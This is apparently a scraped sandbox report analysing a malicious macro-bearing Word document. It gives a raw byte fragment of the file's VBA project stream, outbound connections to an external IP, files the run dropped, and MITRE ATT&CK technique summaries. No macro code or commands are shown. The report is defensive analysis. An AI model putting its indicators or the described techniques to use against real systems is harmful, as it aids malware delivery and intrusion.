Data ASCII:	. . . . . . . . . . 0 . . . . . . H . . . . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . * W d - . . . " . < . . . . r s t d o . l e > . . s . t . . d . o . l . e . ( . . h . . ^ . 9 \\ G . { 0 0 0 2 0 4 3 l 0 - . . . . C . . . . 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ s y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . E N o r m . a l E N C r . m . a F . . c E V C . . . . ( m . ! O . f f i c g O . f Q . i . c g . . g 2 D F 8 D 0 4 . C - 5 B
Data Raw:	01 e1 b1 80 01 00 04 00 00 00 03 00 30 aa 02 02 90 09 00 20 14 06 48 03 00 a8 80 00 00 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 00 08 06 12 09 02 12 80 2a 57 f4 64 2d 00 0c 02 22 0a 3c 02 0a 16 02 72 73 74 64 6f 08 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 00 28 0d 00 68 00 11 5e 01 39 5c 47 00 7b 30 30 30 32

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 11, 2022 21:51:38.112543106 CEST	49171	80	192.168.2.22	45.8.146.139
Aug 11, 2022 21:51:41.114581108 CEST	49171	80	192.168.2.22	45.8.146.139
Aug 11, 2022 21:51:47.183392048 CEST	49171	80	192.168.2.22	45.8.146.139
Aug 11, 2022 21:51:59.198580027 CEST	49172	80	192.168.2.22	45.8.146.139
Aug 11, 2022 21:52:02.207457066 CEST	49172	80	192.168.2.22	45.8.146.139
Aug 11, 2022 21:52:08.214063883 CEST	49172	80	192.168.2.22	45.8.146.139

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

System Behavior

Analysis Process: WINWORD.EXEPID: 204, Parent PID: 576

General

Target ID:	0
Start time:	21:52:12
Start date:	11/08/2022
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x13f760000
File size:	1423704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report suddenlink.doc.08.11.22.doc

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Hooking and other Techniques for Hiding and Protection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EAD25F63.png

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F5B4A08.png

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{7363718C-0FC5-4461-9EF0-562FC1188CC7}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{7BA60EB8-B1D5-4B9A-84DE-67BC33ED9511}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E9ED2FB3-553A-41AD-8A8D-A96BE0FFFE15}.tmp

C:\Users\user\AppData\Local\Temp\~DF6C958FC245A84978.TMP

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\suddenlink.doc.08.11.22.LNK

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

C:\Users\user\Desktop\~$ddenlink.doc.08.11.22.doc

Static File Info

General

File Icon

Static OLE Info

General

OLE File "/opt/package/joesandbox/database/analysis/682722/sample/suddenlink.doc.08.11.22.doc"

Indicators

Streams with VBA

VBA File Name: ThisDocument.cls, Stream Size: 2764

General

VBA Code

Streams

Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 357

General

Stream Path: PROJECTwm, File Type: data, Stream Size: 41

General

Stream Path: VBA/_VBA_PROJECT, File Type: ISO-8859 text, with no line terminators, Stream Size: 7

General

Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 5108

Windows Analysis Report
suddenlink.doc.08.11.22.doc